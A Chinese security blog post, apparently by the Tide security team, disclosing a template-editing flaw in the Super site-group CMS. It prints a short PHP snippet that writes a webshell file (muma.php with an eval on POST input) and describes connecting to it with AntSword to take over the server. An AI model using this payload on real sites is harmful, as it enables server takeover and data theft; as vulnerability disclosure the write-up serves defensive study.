SUPER站群命令执行之官方审核

阅读量419675

发布时间 : 2022-11-15 14:30:25

 

简介

Super站群原来是我们内部自己开发使用的一套程序,后来看到很多人有相似的需求,团队决定发布出来免费开源给大家使用。 桂林思与云文化传媒有限公司Super站群最新版本存在文件上传漏洞,攻击者可利用该漏洞获取服务器控制权限。
适合用在什么场景?推荐有建站基础,懂得SEO的专业人士使用,可用于养域名养权重,关键词流量站、蜘蛛池、企业站乃至个人博客都可以使用。

 

下载程序

官网下载:https://www.cmssuper.com/

下载地址点击以后跳转此页面,点击下载谷歌是没有反应的,360和ie是可以的,谷歌浏览器报错
Mixed Content: The site at '<URL>' was loaded over a secure connection, but the file at '<URL>' was loaded over an insecure connection. This file should be served over HTTPS. This download has been blocked. See <URL> for more details. 提示遇到https和http不兼容问题

打开调试,直接点击url就可以下载或者是改成https点击下载就可以下载了。

但是官方审核到了三级验证中了,点击下载没反应就直接给驳回了。

然后我又重新在文档做了说明,并下载了安装包放到附件里边重新提交的,又要从一级审核开始。

官方大人审核,不敢多言,直接上过程。

 

搭建过程

下载安装包安装完以后,
此时登录后台程序:
地址如下:http://sup.com/admin/#/home 后台效果

进入后台以后:点击系统设置->模板风格->可以下载其他模板以后,点击编辑模板,站点选择该模板。

复制此段程序: 找到首页模板,复制进去,点击保存就可以了。

保存完,运行前端,会在根目录下生成文件。

会在根目录下生成muma.php

恶意代码:

<?php

$file=fopen("muma.php","w");//根目录创建muma.php文件
fwrite($file,'<');
fwrite($file,'?');
fwrite($file,'php');
fwrite($file,' @eval($_POST["cmd"]);');
fwrite($file,'?>');

?>

运行完以后,域名+muma.php

使用蚁剑链接木马,获得服务器权限:

查看数据配置信息:

 

代码分析

点击保存,获取到这个地址。

找到保存方法,获取body内容,stripslashes 函数对内容反斜杠处理,对非法内容并没有过滤。

至此,通过系统后台文件编辑,通过非法代码,运行文件,实现写入木马程序执行,拿到了服务器全部权限、源码,以及数据库信息,造成了很严重的后果。

本文由Tide安全团队原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/283103

安全客 - 有思想的安全新媒体

分享到:微信
+11赞
收藏
Tide安全团队
分享到:微信

发表评论

Tide安全团队

Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。

  • 文章
  • 83
  • 粉丝
  • 71

热门推荐

内容需知
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全客 All Rights Reserved 京ICP备08010314号-66